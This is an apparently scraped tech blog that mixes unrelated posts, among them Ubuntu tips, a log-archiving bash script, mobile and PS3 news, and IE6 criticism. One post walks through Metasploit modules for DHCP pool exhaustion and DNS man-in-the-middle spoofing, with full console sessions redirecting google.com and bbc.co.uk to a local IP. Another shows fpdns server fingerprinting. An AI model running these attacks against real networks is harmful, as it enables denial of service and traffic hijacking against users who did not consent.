RootAdmin.co.uk

Ok so you upgraded to Ubuntu 10.04 and want to move the close, min, max icons from left to right. Just jump to your terminal and run:

gconftool-2 –set “/apps/metacity/general/button_layout” –type string “menu:minimize,maximize,close”

see, its beautiful!

DigiNinja has created a meta sploit module for a DHCP Exhaustion attack tool which continues to request DHCP addresses till it stops getting responses from the server which, as far as I can tell, means the IP pool is exhausted ( meaning  that no there are no available address’s from DHCP and a computer set to get a DHCP address cant get on the network – a very nice idea for a Denial of Service Attack in my oppinion.

He has also created a DNS Man in The Middle module which has been worked on by various people, the last being Wesley McGrew who released his version but never got round to getting it into the Metasploit Framework. The module loads a list of domains to give fake responses for and returns real results for everything else. His work on this was to add the facility to have it reload the config file without a restart by doing a look up on a pre-set domain. He also fixed a couple of minor bugs.

See http://www.digininja.org/metasploit/dns_dhcp_beta.php

Usage

You’ll need to be root to run both modules and for the DHCP module you’ll need to put the interface into promiscious mode before starting the attack so it can hear all the replies to the fake requests. The easiest way to explain how to use them is to just show the modules in use so here they are…

DHCP Exhaustion

msf > use auxiliary/digininja/dhcp_exhaustion/exhaust
msf auxiliary(exhaust) > set

Global
======

No entries in data store.

Module: dhcp_exhaustion/exhaust
===============================

  Name        Value
  ----        -----
  DHCPSERVER  255.255.255.255
  SNAPLEN     65535
  TIMEOUT     2

msf auxiliary(exhaust) > run

[*] DHCP attack started
[*] DHCP offer of address: 192.168.0.53
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.54
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.55
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.56
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.57
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.58
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.59
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.60
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.52
[*] Got the ACK back, IP address allocated successfully
[*] DHCP offer of address: 192.168.0.51
[*] Got the ACK back, IP address allocated successfully
[*] Timeout waiting for OFFER
[*] Got a timeout, assuming DHCP exhausted. You Win
[*] Finished
[*] Auxiliary module execution completed

DNS MiTM

msf > use auxiliary/digininja/dns_mitm/dns_mitm
msf auxiliary(dns_mitm) > set

Global
======

No entries in data store.

Module: dns_mitm/dns_mitm
=========================

  Name     Value
  ----     -----
  RELOAD   digininja.reload
  SRVHOST  0.0.0.0
  SRVPORT  53

msf auxiliary(dns_mitm) > run
[-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: FILENAME, REALDNS.
msf auxiliary(dns_mitm) > set FILENAME /usr/src/metasploit/modules/auxiliary/dns_mitm/dns.txt
FILENAME => /usr/src/metasploit/modules/auxiliary/dns_mitm/dns.txt
msf auxiliary(dns_mitm) > set REALDNS 192.168.0.8
REALDNS => 192.168.0.8
msf auxiliary(dns_mitm) > set

Global
======

No entries in data store.

Module: dns_mitm/dns_mitm
=========================

  Name      Value
  ----      -----
  FILENAME  /usr/src/metasploit/modules/auxiliary/dns_mitm/dns.txt
  REALDNS   192.168.0.8
  RELOAD    digininja.reload
  SRVHOST   0.0.0.0
  SRVPORT   53

msf auxiliary(dns_mitm) > run
[*] Auxiliary module running as background job
msf auxiliary(dns_mitm) >
[*] Loading hosts file

The hosts file contains a single entry

192.168.0.2 google.com

Now do some look ups, google.com and bbc.co.uk

nslookup
> server localhost
Default server: localhost
Address: ::1#53
Default server: localhost
Address: 127.0.0.1#53
> google.com
Server:         localhost
Address:        127.0.0.1#53

Non-authoritative answer:
Name:   google.com
Address: 192.168.0.2
Name:   google.com
Address: 192.168.0.2
Name:   google.com
Address: 192.168.0.2
> bbc.co.uk
Server:         localhost
Address:        127.0.0.1#53

Non-authoritative answer:
Name:   bbc.co.uk
Address: 212.58.224.138

Google is middled but the BBC gets through, now add the BBC to the hosts file

echo "192.168.0.2 bbc.co.uk" >> dns.txt

Refresh the server by looking up the special domain and then check the BBC again

> digininja.reload
Server:         localhost
Address:        127.0.0.1#53

Non-authoritative answer:
*** Can't find digininja.reload: No answer
> bbc.co.uk
Server:         localhost
Address:        127.0.0.1#53

Non-authoritative answer:
Name:   bbc.co.uk
Address: 192.168.0.2

The BBC is now ours!

Here is a list of some bash keyboard shortcuts you may or may not find useful

Alt + B     Move cursor backward one word on the current line
Alt + F     Move cursor forward one word on the current line
Ctrl + A     Go to the beginning of the line you are currently typing on
Ctrl + C     Kill whatever you are running
Ctrl + D     Exit the current shell
Ctrl + E     Go to the end of the line you are currently typing on
Ctrl + H     Same as backspace
Ctrl + K     Clear the line after the cursor
Ctrl + L     Clears the Screen, similar to the clear command
Ctrl + U     Clears the line before the cursor position. If you are at the end of the line, clears the entire line.
Ctrl + R     Let’s you search through previously used commands
Ctrl + T     Swap the last two characters before the cursor
Ctrl + W     Delete the word before the cursor
Ctrl + Z     Puts whatever you are running into a suspended background process. fg restores it.
Esc + T     Swap the last two words before the cursor
Tab         Auto-complete files and folder names

Well below is my first attempt at a shell script, firstly understand I am no programmer!

Before we look at it, my server is running OPENVPN and Uncomplicated Firewall(I’m running Ubuntu Server)

So how does it work?

Firstly we declare that we are using the bash shell using
#!/bin/bash

Next we’re setup some vairables, the first is simply formating the date and calling itself TODAYSDATE,
next we set todays archive to be archive.TODAYSDATE and call its self TODAYS_ARCHIVE

Next we create a directory called archive.TODAYSDATE

Now to the best bit, we start processing the logs
- We extract todays logs out of syslog
- From the extracted logs we extract the firewall (Uncomplicated Firewal/ UFW) logs to a seperate file
- Now extract todays messages log
- From todays extracted logs extract all OPENVPN related logs to a seperate log file
- Extract todays apache access.log and error.log
- Provide us with the currently running processes
- Zip it all up to the /archive/ folder
- back back up a directory level and delete the folder called archive.TODAYSDATE
- Now use mutt to attach the zip file to a email and send it

Now for the script – PLEASE FEEL FREE TO USE

#!/bin/bash
# Script By Liam Somerville, www.rootadmin.co.uk
# Use freely

#####################################################################
#                        Set up the variables
#####################################################################
#Set todays date
TODAYSDATE=`date +”%d-%b-%Y”`

#Format Archive
TODAYS_ARCHIVE=archive.$TODAYSDATE

#####################################################################
#                    Finished setting up Variables
#
#                   Now start processing the log files
#####################################################################

# Make a directory called archive with todays date and change to that direcory
mkdir $TODAYS_ARCHIVE
cd $TODAYS_ARCHIVE

#Write the log files
#Archive todays Syslog, extract all firewall related logs to firewall, then
# extract messages
cat /var/log/syslog | grep “`date +”%b %e” `” > syslog.$TODAYSDATE
cat syslog.$TODAYSDATE | grep UFW > firewall_log.$TODAYSDATE
cat /var/log/messages | grep “`date +”%b %e” `” > messages.$TODAYSDATE
#Process the OPEN VPN Server logs
cat syslog.$TODAYSDATE | grep “ovpn-server” > vpn_server_log.$TODAYSDATE
#
#Proceess Apache Logs
cat /var/log/apache2/error.log | grep “`date +”%b %d” `” > apache_error_log.$TODAYSDATE
cat /var/log/apache2/access.log | grep “`date +”%d/%b” `” > apache_access_log.$TODAYSDATE
#
#Process FTP Logs
cat /var/log/vsftpd.log | grep “`date +”%b %e” `” > ftp_log.$TODAYSDATE
#
# Get a list of currently running process
ps aux > Processes.$TODAYSDATE

# Zip up all the logs and delete todays log
zip /archive/$TODAYS_ARCHIVE.zip *
cd ..
rm -r $TODAYS_ARCHIVE

####################################################################
#                     Now email the zip file
###################################################################
echo | mutt -a /archive/$TODAYS_ARCHIVE.zip -s “Event logs for $TODAYSDATE” you@your.email.address.com

Tesco Mobile through its joint venture partnership with O2 is pleased to announce that it will shortly introduce iPhone 3G and iPhone 3GS in Tesco Phone Shops and online through Tesco Direct in the UK.

For further information and for customers interested in pre-registration please visit http://www.tescomobileiphone.com/.

For more information on iPhone, please visit www.apple.com/uk/iphone.

More information can be found on Tesco Mobile at http://www.tescomobile.com/

About Tesco Mobile:

Tesco Mobile is a 50:50 joint venture between Tesco and O2. The company sells exclusively Tesco Mobile branded services in Tesco stores, online and through Tesco Direct, across the UK using O2’s technology and network.

Tesco Mobile is also available in the rapidly expanding estate of Tesco Phone Shops which will number over 100 by the end of 2009.

The network gives its customers value, simplicity and choice, offering them award winning, simple, great value Pay as you go and Pay monthly tariffs with rewards such as free credit and Clubcard points.

It is the fastest growing Pay as you go network in 2009 and has been voted as the number one mobile network for customer satisfaction by Which Magazine (May 09).

Following the decision of the European Parliament that enables European member states to approve laws that force ISPs to disconnect individuals from the Internet, the UK is planning on enforcing its own version of the “three-strikes” law meant to discourage illegal file sharing.

According to The Guardian, Lord Peter Mandelson, the Business Secretary, announced that this law is supposed become reality in 2011. It will go through a 12 months long testing phase that will see warning letters sent to persistent offenders. If the scope of the illegal activity doesn’t drop by at least 70 percent by April 2011, three months later the practice of cutting off the Internet access will be set in motion.

There were a lot of voices raised against this plan. ISPs don’t want the responsibility – it’s bad for their public image, and also raises operational costs. The Open Rights Group sees it as an infringement of basic rights. Times Online reports that even UK’s law enforcement and intelligence services are against it. They fear that pirates will begin to use encryption and thus make their job even harder (not to mention the increase of workload and costs).

On the opposite side sit the music and movie industries. They are, of course, anxious to see the law in practice since they “lose” hundreds of millions of pounds every year.

SIGN THE PETITION http://petitions.number10.gov.uk/dontdisconnectus/ – UK Citizens only

Install fpdns in Ubuntu

sudo aptitude install fpdns

This will complete the installation

Using fpdns

fpdns [-c] [-d] [-f] [-p port] [-Q srcaddr] [-r retry] [-s] [-t timeout] [-v] server

Where: server is an ip address or a resolvable name
or ‘-’ to read list of servers from stdin
-c (where appropriate check CH TXT version) [off]
-d (debug) [off]
-f (force check CH TXT version) [off]
-F (maximum forked processes) [10]
-p port (nameserver is on this port) [53]
-Q srcaddr (source IP address) [0.0.0.0]
-r retry (set number of attempts) [1]
-s (short form) [off]
-t time (set query timeout) [5]
-v (show version)

fpdns Examples

BIND Version 8 Example

fpdns -D google.com

fingerprint (google.com, 216.239.34.10): ISC BIND 8.3.0-RC1 — 8.4.4
fingerprint (google.com, 216.239.36.10): ISC BIND 8.3.0-RC1 — 8.4.4
fingerprint (google.com, 216.239.38.10): ISC BIND 8.3.0-RC1 — 8.4.4
fingerprint (google.com, 216.239.32.10): ISC BIND 8.3.0-RC1 — 8.4.4

BIND Version 9 Example

fpdns -D debianhelp.co.uk

fingerprint (debianhelp.co.uk, 212.67.202.2): ISC BIND 9.2.3rc1 — 9.4.0a0 [recursion enabled]
fingerprint (debianhelp.co.uk, 212.67.203.246): ISC BIND 9.2.3rc1 — 9.4.0a0 [recursion enabled]

TinyDNS Example

fpdns ns1.eu.dedicatedserver.com.

fingerprint (ns1.eu.dedicatedserver.com., 213.198.65.226): DJ Bernstein TinyDNS 1.05

Microsoft windows 2003 Example
fpdns -D microsoft.com

fingerprint (microsoft.com, 207.68.160.190): Microsoft Windows DNS 2003
fingerprint (microsoft.com, 65.54.240.126): Microsoft Windows DNS 2003

Well, the update for the PS3 version 3.0 looks very disapointing.

It’s due to be released on Setpember 1st.

i everyone, PlayStation 3 (PS3) firmware update (v3.00) adds a number of great new features that we’re excited to share with you. The latest update incorporates changes that improve navigation on your PS3. First, you’ll notice some cosmetic changes to the design of the XMB (Xross Media Bar). We’ve enhanced the look and feel of the XMB so that it’s easier and even more intuitive to use. We’ve also added network improvements and personalization options to help enhance your PS3 experience.

Additional highlights from update 3.00 include:

• “What’s New” – The “Information Board” will be replaced with a “What’s New” section, which allows you to enjoy interactive PlayStation news every time you start the PS3 system. Located under the PlayStation Network icon, “What’s New” displays the latest and greatest game, video, PlayStation Network and PlayStation news and releases, as well as your recently played games, in a sleek, new animated format.
• Status Indicator – In the top right corner we’ve added an indicator bar, which displays your user icon, friend icon, the number of friends you have online and a small message icon to let you know if you have any new messages. The indicator also includes a scrolling ticker that features the latest news from PlayStation Network. In addition, when you press the PS button, the battery life indicator will no longer cover up the clock.
• Friends List – Now your PlayStation Network friends will appear in a slightly redesigned format on your Friends List. Also, messages will now be viewable from each of your friends’ respective profiles.
• PlayStation Store Shortcuts – We’ve added a handy shortcut icon to the PlayStation Store under both the Game and Video categories so you can access the latest content quickly and easily.
• Personalization – Personalize your PS3 with new dynamic custom themes and avatars. Dynamic themes as well as free and premium avatars will be available through PlayStation Store. A dynamic theme takes your screen to a whole new level as it incorporates animated objects into the background.
• Trophies – Showcasing your hard earned trophies just got better. Update 3.00 gives game developers the ability to modify how they display trophies for add-on content. Base and add-on game trophies will continue to be combined into a single list so you can see where you stand in a game as a whole. Within that list, trophies will be broken out into subcategories—base trophies and add-on trophies—that way, you can easily view the percentage of your base game trophy collection, and separately track your trophy progress in add-on packs. Look for this enhancement to be included in upcoming games.

GIVE IT UP, microsoft have said they will support IE 6 until 2014. IE 6 was initially realease on August 27, 2001, come the prposed end of life date – 2014, IE 6 will be 13 years old! In computing terms, that will make IE 6 a dinosaur.

As of January 10, 2009, Secunia reports 142 vulnerabilities in Internet Explorer 6, 22 of which are unpatched, some of which are rated moderately critical in severity.

“Microsoft has underlined support for its Internet Explorer 6 web browser, despite acknowledging its flaws.

The software giant said it would support IE6 until 2014 – four years beyond the original deadline.

Critics – some of which have started an online campaign – want the eight-year-old browser mothballed because they claim it slows the online experience.

“Friends do not let friends use IE6,” said Amy Barzdukas, Microsoft’s general manager for Internet Explorer.

“If you are in my social set and I have been to your house for dinner, you are not using IE6,” she said. “But it is much more complicated when you move into a business setting.”

“It’s hard to be cavalier in this economy and say ‘oh it’s been around for so long they need to upgrade,’” Ms Barzdukas told journalists in San Francisco..

Web monitoring firms estimate that 15-20% of people still use IE6 to browse the web.

Enough is enough

Among those speaking out against IE6 is a group of more than 70 developers who have banded together to form a project called ie6nomore.” – http://news.bbc.co.uk/1/hi/technology/8196242.stm

Why not take a look at IE6NoMore

For some time now I have believed that there has been too much importance placed on the acadmic world. Today it would appear I was proven right.